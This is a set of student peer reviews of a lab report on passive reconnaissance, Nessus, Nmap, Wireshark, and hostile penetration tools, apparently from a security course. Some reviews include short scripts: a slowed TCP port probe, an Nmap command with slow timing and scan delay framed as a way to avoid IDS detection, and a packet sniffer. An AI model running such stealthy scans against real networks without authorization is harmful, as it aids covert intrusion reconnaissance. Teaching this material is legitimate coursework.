Team one's effort this week is an improvement over last week. There is an issue with a change in voice, and the authors should be wary of writing in the first person singular.
Your literature review thoroughly summarizes the articles, and the group makes an attempt to evaluate the literature as well as relate it to the labs. You use first person singular voice in the literature review, but there are three of you in the group. It wouldn’t be a big deal, except that the author submits an opinion. Do all of you agree or has one of your members gone rogue? I find it interesting that this group was able to glean so much from the Godefroid article, given that it was an abstract to a presentation. Is there a relationship between Jung et al and passive scanning in particular?
The section covering Part 1 is very vague. I'm unclear as to what your methods are here, and what the table represents. Are all the tools listed supposed to be passive reconnaissance tools? I don't understand how your findings relate to the table.
Part 2A is completely different. The methods section is written well. Screenshots would be nice but aren't really necessary since these are command line tools. I think I could repeat the experiment with the given steps. I like that you based your thoughts on the tools being biased on numbers from documentation rather than one test of one operating system. Your setup for the second scan should be in the methods section, but it is still very detailed and easy to follow. Your analysis of the passive scan was exceptionally detailed and very well done.
In Part 2B, where did you get the information for your case study? What about exploiting vulnerabilities in penetration tools themselves? You give good examples of tools that are used in or to create exploits, but the idea was to look into the issue of the tool being used against the operator. In your prevention methods, you advocate the use of digital signatures. Is there a chance the signature could be forged? Can a reliable source be compromised without their knowledge? Creators of open source tools may have perfectly legitimate reasons for wanting to keep their identity a secret. What if the tool created is considered by some governments to be a weapon, for example? I don't think it's valid to use a desire for anonymity as a basis for judging the safety of a tool. If you outsource code auditing, what is the potential that something will be missed? Who is liable? Does this process become more difficult with increased complexity of the code? You ask the question, “What are the risks of using untested or exploited penetration tools?” but the paragraph that follows doesn't really answer the question, or even have much to do with it.
I would comment that I thought the literature review to be decently put together. I believe this group excelled in comparing the two articles given in a head-to-head fashion: something which few other groups attempted. The way in which this literature review was written made for fairly easy reading; although I found the use of the first person in certain areas to be out of place. I thought the ‘Findings’ section to attempt a reasonably detailed examination of Part 1: certainly a step in the right direction. Additionally, I found the discussion of Part 2B, that on exploits in security tools, to be nicely done, even if I cannot agree entirely with some of the ideas presented. Finally, commendable effort in ‘presentation’ is noticeable from this team; in this regard I believe this team to be continually improving.
These positive points aside, numerous problems were detected in this write-up: some relatively trivial, others severe, possibly fundamental errors. First, I found the use of ‘the student’ a strange choice in wording for the abstract section: this reads like a lab instruction sheet, and not an abstract; consider using ‘we’ or using a personal passive voice, such as “the biases were determined” or “tools were identified.” Additionally, I found no ‘methodology’ or ‘procedure’ detailed under the ‘Methods’ section for Part 1, but found what appeared to be the ‘results’ listed instead. Furthermore, this table of ‘passive’ tools did not appear to be well conceived. I noted ‘ping’ listed, along with a number of ‘spoofers’ and active scanners (‘superscan,’ ‘unicornscan,’ etc.). I would ask: how can you possibly classify ‘ping’ as a ‘passive’ tool? It appears to me that little research effort went into assembling this tool listing, as many tools included are of an obvious ‘active’ nature. Additionally, I tried to rectify these dubious tools to some logically consistent pattern in the report, i.e. did the team present that ‘slowing’ an ‘active’ tool could reclassify it as ‘passive?’ Conclusively, this could not be an explanation: they are adamant in asserting that ‘speed’ does not change the nature of the tool: hence, these are likely errors.
The lab exercise appeared to be performed improperly for some stages of testing. For the ‘meta exploit’ test, which was to involve three hosts, the data presented almost certainly points to only two hosts being used. I find it likely that ‘Wireshark’ was run on the same machine which was designated to be the ‘attacker,’ and so find the reported data to be flawed. I think it should be obvious that if a ‘sniffer’ is run on the same machine as a ‘scanner,’ this ‘sniffer’ will naturally be privy to all the network traffic the ‘scanner’ is. This is not true when the ‘sniffer’ is run as a separate host on the network (at least in the virtual ‘switched’ network environment used in this experiment), and so I deem the results of the ‘meta exploit’ test to be fundamentally flawed. Furthermore, I question the assertion that ‘Nmap,’ and more so ‘Nessus’ are predominately biased in favor of Microsoft based operating systems. I, too, initially thought (before researching it) that this would be the case: but a cursory examination of the ‘Nessus plug-in’ link that is provided proves this is ‘resoundingly’ not true. I would ask: what evidence leads to this conclusion, as nothing which supports the ‘Microsoft’ argument is found in the write-up?
I find a number of problems present in the ‘hostile tools’ discussion (2B). Foremost, I do not find the case study chosen in relation to the ‘Metasploit’ framework to be relevant in the discussion: no flaw was found in the framework itself; rather, it was used by security professionals ‘to find’ a flaw in VML. How is this representative of a ‘hostile’ or ‘exploited’ penetration tool? I believe the ‘Netcat’ case study legitimate, but take exception to the ‘gaping security hole’ assertion. The abuse of a tool is not really ‘a security hole,’ nor do I think ‘Netcat’ a case of exceptional note. Any application, such as Mozilla Firefox, or telnet, or SSH, or notepad, ad infinitum can be used ‘abusively,’ yet I do not believe that many would classify those programs ‘to have gaping security holes’ because of this. Does a screwdriver have a ‘gaping security hole’ because it is often used to force locks?
Finally, I found the discussion on ways to counter these ‘hostile’ tools to be a bit vague. Many ‘name-able’ concrete methods are available in this area (MD5 hashes, Tripwire, jails, etc.), so why resort only to generalities? Additionally, the section which addressed the risks of untested or exploited penetration tools seemed to miss the point of the question entirely. The question asked is not about the dangers of penetration testing, but about the dangers of ‘trojan’ or ‘compromised’ tools used in penetration testing. I would submit the ‘real’ danger in this case is: that nothing unusual happens during the test, that no machines are taken down; and because of this no one notices that sensitive data is altered or stolen.
The group's abstract talks about the different steps in the lab and how they will accomplish each part of the lab. The group briefly describes each part, but they do not state very strongly what this lab is trying to convey. In the first sentence they say that the lab is about passive reconnaissance, but nothing more. Instead of just going over each part of the lab in the abstract, they should have discussed the importance of this lab, given a brief definition of what passive reconnaissance is, and briefly described the results of the lab.

Next the group goes into their literature review. The group starts off with a good description of what both papers are trying to convey. They talk about what passive reconnaissance is and the difference between blackbox testing and whitebox testing. The group does a good job of comparing the two papers that were given in this lab. The group gives their opinion by saying that they agree with Godefroid's idea of using whitebox testing instead of blackbox testing. The group then continues by giving an explanation of what Privacy Oracle is and how the Jung et al paper used Privacy Oracle to find information leaks in many applications. Then the group talks about how Jung et al set up their test and the applications used in the test. Last in the literature review, the group concludes with a discussion of the ups and downs of using blackbox testing on applications. In the literature review the group does a great job of describing the methods of the papers and how they compare with each other. The group does not mention how these papers tie into this lab, though. They do mention the theme of each of the papers at the beginning of the literature review, but they do not mention the question that each paper is trying to answer. Also, the group does not go over any errors or omissions in the papers.

Next the group starts the first part of the lab by creating a table that contains the passive tools from the first lab's table. The table was put together nicely. The table shows how the passive tools used in this lab tend to lean toward the application layer more than any other layer. It also shows how most of the tools attack confidentiality more than integrity or availability. The group then gives their findings on a couple of questions given in the first part of the lab. They discovered that a good tool to use to recreate packet streams passively is Snort. Also in the findings, they talk about how to slow down a tool or script and why that would aid in disguising the attack.

Next the group goes into the second part of the lab. In this part, the group started off by explaining how they obtained, installed, and ran Nessus and Nmap on one of the virtual machines set up in the first lab. The group dedicated a lot of this section to describing how they set up and ran Nessus, but did not cover much of Nmap. This could have been because Nmap was easier to set up and run. Next the group discussed their findings. They start by saying that because Nessus has a lot of tools, it is easier to sieve through the information. They also mention that the attacks from Nessus will fit into the OSI model and McCumber's cube. They do not give any data on how these attacks will fit into the OSI model or McCumber's cube, though. Next the group talks about the bias of Nessus and Nmap toward operating systems. The group mentions that Nessus is biased toward Windows operating systems because of their popularity. The group also mentions that Nmap does not have a bias, but could be used on Windows systems more than others. Next the group described how they ran Wireshark against Nessus and Nmap. They did a nice job of explaining the commands used to run the programs and how the test was set up. They explained how all the packets, both sent and received, were captured by showing an example of each. The group then discusses how the data from Wireshark can be used by an attacker to follow Nessus and gain the information they need. They also mentioned briefly how an attack from Nessus can be seen using Wireshark. The group could have discussed more about how passive tools could be used to detect active attacks on a system. The group is looking at this from the perspective of how an attacker can use this data to perform an attack. They do not look at this from the perspective of someone who is trying to stop an attacker from compromising their network. In the next section the group does show how Snort can be used in conjunction with Nessus and Wireshark to help prevent security testers from giving away important information when scanning a network. Last in this section, the group does a nice job of concluding this part of the lab. They give some nice examples of how this information could help in preventing attacks on a network and some ideas of what needs to be done to reduce the risks to a network.

Next the group went into the last part of the lab. The group starts off explaining how tools that were once used to help networks are now being used to break into and exploit networks. They also explain that these tools can be obtained easily by both sides. The group puts together three case studies to show how penetration tools were used in a harmful way. The three tools that the group used were Metasploit, John The Ripper 1.0, and NetCat. In each case study the group does a good job of describing the tool. Then they tell how each tool can be used in a bad way, and they back that up by giving a case study in which the tool is used in a bad way to exploit a computer. Next the group discusses ways to ensure that the tools you are using are not hostile. The group gives some nice examples of how to determine whether a program is hostile. They also mention that these methods do not ensure that the program is safe, but are indicators. They mention that the best way to ensure the safety of a program is to allow users to examine the source code. The group then explains the process of auditing source code. They concentrate on the use of a tool called Pscan. I believe that the group could have expanded on this part of the lab and shown how source code auditing occurs. In the last section of this part of the lab, the group discusses how untested penetration tools can harm a company's network. The group explains how using untested penetration tools can range from just slowing down a network to damaging it. The group could have explained and given some examples of how this could happen. At the end of the lab, the group gave a description of some issues they had with the Debian VM. Then the group gave the conclusion to the lab. The conclusion does a nice job of going over what was done in each part of the lab. I believe that the group could have done a better job of describing the findings of each part of the lab, and they could have given a better summary of what was learned in this lab.
I have to disagree with the statement “Whitebox testing is the same method as blackbox testing but it looks at the inside perspective.” While whitebox testing involves help from the staff, blackbox testing is closer to what a hacker would do without the knowledge of the organization's information technology team. In the statement “I think the best way to test the system is to see it from the inside perspective as opposed to blackbox testing, while looks at it from the outside perspective, which Privacy Oracle does”, what was the rationale for thinking that the inside perspective was better than the blackbox testing method? Without the rationale, that section seemed incomplete.
I also have to disagree with the statement “The author purposed an alternative to whitebox fuzz testing.” In the paper, Patrice Godefroid did not propose an alternative to whitebox fuzz testing, but rather gave an alternative to blackbox testing, which was whitebox fuzz testing.
Group one's methods part one section did not contain any type of explanation, but consisted only of a table. The group should have stated how the table was set up and gone into more detail about passive reconnaissance tools.
In the findings section the group stated that “One can make a script or tool slow down by setting the time for the attack to take longer”, but the group did not explain how this could be accomplished; a short illustration follows below. However, I do agree with the group’s statement “Though, it will still be considered active as opposed to passive.” Slowing down the attack would not change the nature of the tool; it would only change the amount of time the tool takes to perform its functions.
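To make the point concrete, here is a minimal sketch of what “setting the time for the attack to take longer” can mean in practice. The target address, port list, and delay are placeholders for illustration only; the probe is still an active connection attempt, exactly as the group notes, it just proceeds slowly enough to be less obvious to rate-based detection.

    import socket
    import time

    TARGET = "192.168.56.101"      # placeholder target for illustration only
    PORTS = [21, 22, 25, 80, 443]
    DELAY_SECONDS = 30             # long pause between probes

    for port in PORTS:
        probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        probe.settimeout(2)
        try:
            state = "open" if probe.connect_ex((TARGET, port)) == 0 else "closed/filtered"
            print("%s:%d %s" % (TARGET, port, state))
        finally:
            probe.close()
        time.sleep(DELAY_SECONDS)  # this sleep is all that "slowing down" amounts to

The same traffic is generated either way; only the timing changes, which is why the tool remains active rather than passive.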
I found it somewhat odd that group one had two separate methods sections. What was the rationale for splitting the methods into two sections? The group did a good job describing how they set up Nessus in their virtual environment, but the description of Nmap was rather thin.
In the findings section, I have to partially disagree with the statement “This does allow an attacker sieve the information more quickly. This is because it only takes a few packets for Nessus to discover a vulnerable port on the target system.” With the ability to discover over 1,000 vulnerabilities, Nessus would find more vulnerabilities, but the more plug-ins that are installed, the longer it takes Nessus to locate all of the potential vulnerabilities. In the statement “I think that if the Nessus vulnerabilities were put into a grid, like the tools have been in previous labs, patterns would emerge”, the group said a pattern would emerge, but they did not say what that pattern would be. I have to disagree with the statement “Based on the numbers obtained from http://www.nessus.org/plugins/index.php?view=all, most of the vulnerabilities pertain to Windows operating systems (Tenable Network Security, 2009)” because several of those plug-ins were Unix/Linux based as well. In the statement “When an attacker performs an Nmap or Nessus scan against a network, it’s a good idea to slow down the attack to prevent an IDS system from detecting the scan”, the group again did not explain how this could be accomplished; Nmap’s slower timing templates and explicit scan delays are exactly this kind of control, as the brief example below shows.
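For completeness, the slowdown the group alludes to is built into Nmap itself through its timing options. The sketch below assumes Nmap is installed and on the PATH and that the placeholder address is reachable; it simply invokes Nmap from Python with a slow timing template and an explicit delay between probes. A SYN scan (-sS) also requires root privileges.

    import subprocess

    target = "192.168.56.101"   # placeholder address for illustration

    # -T1 is one of Nmap's slower timing templates (-T0 is slower still),
    # and --scan-delay enforces a minimum wait between probes.
    subprocess.run(["nmap", "-sS", "-T1", "--scan-delay", "15s", target], check=True)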
The group did a good job answering the questions in section 2b.
Team 1 begins with an abstract describing the goals and procedures of their lab project. They proceed with a literature review of the articles that were assigned reading for this week. Team 1 describes the difference between blackbox and whitebox testing. They make the statement that they believe that whitebox testing is better. I don’t believe it’s a matter of choosing whether blackbox or whitebox fuzz testing is better. The methods have their own specific purposes. In the article on Privacy Oracle, they are testing proprietary software, and therefore likely don’t know the internal structure of the source code. Their goal is not to test the internal operation of the program for errors, but to determine if it is sending private information to a third party. Team 1 included a list of applications that were tested using Privacy Oracle. The list of applications is a bit unnecessary here since our goal isn’t to learn what applications they tested but what techniques they used in testing, how those techniques relate to our lab, what the testing results were, and what we can deduce from the results.
Team 1 describes the procedures and findings from testing Nessus and nmap. They discuss running Nessus and nmap while running Wireshark and how the packets from the scan could be captured by an attacker. They introduce Snort, which is an intrusion detection and prevention system (IDS/IPS), and they discuss how slowing a tool may help it avoid detection by an IDS. Their finding is that it is possible to gain telemetry from an active tool by using a passive tool, because both sides of the conversation are captured. Our own tests show that effective packet sniffing depends largely on where the packet sniffer is placed: to capture all of the packets, the sniffer needs to sit in a position that the traffic actually passes through.
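That placement point can be illustrated with a short capture sketch. Assuming Scapy is installed, the script runs with capture privileges, and “eth0” and the host address are placeholders for the monitored segment, the sniffer below only ever sees packets that actually traverse the interface it listens on, which is exactly why sensor placement matters.

    from scapy.all import sniff

    CAPTURE_FILTER = "host 192.168.56.101 and tcp"   # placeholder scan target

    # Capture both directions of the conversation crossing this interface.
    packets = sniff(iface="eth0", filter=CAPTURE_FILTER, count=50)
    for packet in packets:
        print(packet.summary())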
Team 1 includes a case study of an Internet Explorer vulnerability that was found. I believe that Internet Explorer falls outside the bounds of “network penetration tools” as described in our assignment. They also include a discussion on how attackers can use Netcat and John the Ripper as attack tools. I believe the goal of the lab was to find network penetration tools that had been exploited to be hostile against the users of the tool. These are simply tools that can be used for good or evil, depending on whose hands they fall into.
They then include several good suggestions for protecting the organization against exploited tools, along with a brief discussion of tools and procedures for testing source code. They conclude this section with a discussion of the risks of using untested or exploited penetration tools, and they make a comparison between white box penetration testing and black box penetration testing.
In my opinion Team 1 spent too much effort describing how they installed the tools and not enough effort explaining what they did with the tools and what was discovered. I believe their inclusion of Internet Explorer falls far outside the definition of a network penetration tool as required by the lab assignment.
The team starts with their abstract and identifies that they will be looking at passive attacks for this lab. They then go on to the literature review and describe the papers that were read. They do a good job comparing and contrasting and even put their own thoughts into the discussion of the topics. One thing that could help, as I told the other groups, is to seek out additional sources that may support your stance or strengthen the arguments between the pieces of literature.
The team then goes into the methodologies and explains what they are going to do and the tools that they will be using. The thing that threw me off was the multiple findings sections; in the future, putting the findings together and then splitting them into subsections would create a more organized lab. Upon further reading it was noticed that this group installed Nessus onto a Linux operating system rather than one of the Microsoft operating systems. Was there a particular reason this was done? The statement that Nessus is more geared toward finding vulnerabilities in Windows is agreeable, but do you think this might change in the future if another operating system becomes dominant? Are Windows systems subjected to numerous attacks because of their wide use, since an attacker would want the most “bang for his or her buck” when going after a system?
Next the authors discuss the second part of the methodologies, and it was noticed that the findings for this section were intertwined within the methods rather than presented in response to the actions taken. This made reviewing the lab a little more difficult and may have caused some confusion for this reader. They did, however, describe some of the criteria by which a tool would be deemed appropriate for use within an enterprise or company setting. Too often administrators become lazy and try to find the quickest way to do things, which may not be the best or standard way, so criteria like these help others create a checklist of approved tools for uses such as checking for vulnerabilities. Which of the tools used in the lab would be considered hostile or non-hostile? What would allow a tool to be approved for standard use outside the lab environment?
The team then discusses the issues they had with the lab, which came down to a storage problem on the VMs that affected multiple teams. They finish with their conclusion and what they found based upon the lab. The conclusion seemed a little simple, but it did serve its purpose in describing what they learned within lab three.
The team started with a strong abstract indicating the key points of their laboratory. They covered the different tools the team was going to use for scanning packets. Their literature review was very in-depth; they covered blackbox and whitebox testing as the main topic of the readings. At the end of the literature review the team asks a question: does the software itself need to be tested before it can be used to test other applications?
Software should be reviewed and tested against known results before it is relied upon; otherwise, software that compiles correctly may still not function as desired. Using software that has not been properly tested is like taking a prototype car out for a high-speed test at speeds exceeding 110 miles per hour without checking whether the ball joints are properly installed or whether they can handle speeds greater than fifty-five miles per hour. Putting products into production without testing them can result in improper telemetry readings, and those improper readings can produce false positives or false negatives. If a tool that is supposed to keep a user from being detected is used without testing and reports a false negative, then the tool has failed at the very purpose it was created for. Another way to look at this: if a tool created for defense was never tested or reviewed, there would be no way of knowing whether it is accurately serving its purpose. That defensive tool may not be defending at all, and attackers would then have a sure way into the network. A minimal sketch of the kind of baseline check I have in mind follows.
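The sketch below is only an illustration of the idea, not any particular tool: it opens a listener on a loopback port we control, so the expected result is known, and then confirms that a simple probe reports that port as open. The port number and the probe itself are placeholders.

    import socket
    import threading

    KNOWN_PORT = 8888                  # a port we control, so the expected result is known
    ready = threading.Event()

    def listener():
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.bind(("127.0.0.1", KNOWN_PORT))
        srv.listen(1)
        ready.set()                    # the known-open port now exists
        conn, _ = srv.accept()
        conn.close()
        srv.close()

    threading.Thread(target=listener, daemon=True).start()
    ready.wait(timeout=5)

    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.settimeout(2)
    result = probe.connect_ex(("127.0.0.1", KNOWN_PORT))
    probe.close()

    assert result == 0, "probe failed to report a port we know is open"
    print("probe reports the expected result against a known-open port")

If a tool cannot pass a trivial check like this against a known configuration, there is little reason to trust its telemetry against an unknown one.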
The team then has a chart in methods part 1. The chart is well organized and easy to read, but a short paragraph explaining the chart would have been helpful for readers, especially readers who have not read the laboratory report; people outside this class would greatly appreciate an explanation. For part 2a, I understand that the Debian VM is short on space after installing packages, but why choose Ubuntu as the replacement VM? If you already have BackTrack, why build another VM when most of the tools are already installed on BackTrack, which was used later in the lab report anyway? Nessus was the only program missing from BackTrack, and there are tutorials available for installing Nessus on it; one was even posted on Blackboard. Another question would be why use a Linux VM at all? If the VM was too short on space, why not switch to a Windows machine, since the required software can be obtained for both operating systems?